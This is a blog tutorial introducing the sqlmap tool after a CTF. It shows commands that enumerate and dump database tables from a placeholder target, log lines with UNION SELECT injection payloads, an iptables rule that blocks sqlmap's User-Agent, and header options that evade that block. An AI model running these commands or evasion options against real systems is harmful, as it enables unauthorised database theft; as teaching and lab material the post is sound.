Recently, I was doing a CTF (article here) and used sqlmap for the first time. When I used it, I wasn’t too sure what all was going on, so I thought it would be a good idea to do a writeup about it. I’ve decided to make a new series called “Tool Time” where I introduce you (and sometimes me) to a security tool. In general, these articles will serve as a good introduction to the tool (basic source data, how to use it and some random information).

I’m going to attempt to develop out a format for these articles for consistency. As this is the first one, future articles may change.

Better Know Your Tool

Site: sqlmap on GitHub

Twitter: @sqlmap

Language: Python (2.6.x and 2.7.x)

Kali included: yes (just run sqlmap)

What is sqlmap?

It’s a tool to detect and exploit SQL injection vulnerabilities in database servers.

This tool can do a lot, so it’s best to spend some time looking into all of the options.

Where’s Help?

$ sqlmap -hh

That command (or python sqlmap.py -hh when running from a source checkout) will give you all of the options/switches. You can use -h instead, which will give you a shorter list of the most common ones.

Key Features

If you want all of the features, take a look at their wiki. There’s a lot listed.

Sqlmap supports many database management systems, such as MySQL, Oracle, Microsoft SQL Server, etc.

It can enumerate users, password hashes, tables, columns and more. It can also connect directly to the DB.

And it can search for specific database names, tables and columns.

Using sqlmap

Here’s a quick example of using sqlmap.

Getting initial DB information:

$ sqlmap -u http://mytarget/login.php --data="user=1&password=1&s=Submit"

Getting a list of databases on the system (MySQL):

$ sqlmap -u "http://mytarget/login.php" --data="user=1&password=1&s=Submit" --dbms=mysql --dbs

Getting tables inside of a database (MyWordpressDB):

$ sqlmap -u http://mytarget/login.php --data="user=1&password=1&s=Submit" --dbms=mysql --tables -D MyWordpressDB

Getting data inside of a table (users):

$ sqlmap -u http://mytarget/login.php --data="user=1&password=1&s=Submit" --dbms=mysql --dump -T users -D MyWordpressDB

Another example would be just pointing -u to a page that takes a GET parameter and going from there.

Server logs

Using sqlmap is pretty noisy. I pointed it at my test WordPress VM and just ran the initial check (telling sqlmap that I was using MySQL).

The result was 100+ log entries almost instantly, like these:

3 - - [01/Aug/2015:16:23:38 -0700] "POST /wp-login.php HTTP/1.1" 200 1568 "-" "sqlmap/1.0-dev-nongit-20150719 ("
... - - [01/Aug/2015:16:28:52 -0700] "GET /?s=lkk%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 HTTP/1.1" 200 3300 "-" "sqlmap/1.0-dev-git-20150719 ("

iptables

After testing this tool against one of my VMs, my next task was to update my iptables rules to detect sqlmap.

Here’s a real quick and dirty example:

$ sudo iptables -I INPUT -p tcp --dport 80 -m string --algo bm --string "sqlmap" -j DROP

This rule looks for the string "sqlmap" (which sqlmap puts in its default User-Agent header) in TCP packets to port 80 and drops them. Of course, if any other legitimate request happens to contain that text, it’s gone too. Note that -m string matches bytes packet by packet and case-sensitively, so it only catches the default User-Agent and nothing else about the traffic.

So now that sqlmap is blocked, what now? Random agents.

$ sqlmap -u <target URL> --dbms=MySQL --random-agent

And now the log will look something like:

5 - - [01/Aug/2015:17:12:13 -0700] "GET /?s=lkk%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 HTTP/1.1" 200 3308 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv: Gecko/20091201 MRA 5.5 (build 02842) Firefox/3.5.6"

or:

- - [01/Aug/2015:17:12:07 -0700] "GET /?s=-1322%20ORDER%20BY%201%23 HTTP/1.1" 200 3268 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv: Gecko/20091201 MRA 5.5 (build 02842) Firefox/3.5.6"

Of interest will be the following options, which change the request headers that a signature like the one above keys on:

  • --random-agent (use a randomly selected HTTP User-Agent value)
  • --user-agent=WHATEVER (pass in a specific User-Agent to use)
  • --host=WHATEVER (HTTP Host header value)
  • --referer=WHATEVER (HTTP Referer header value)
  • --proxy=PROXY (use a proxy to connect to the target)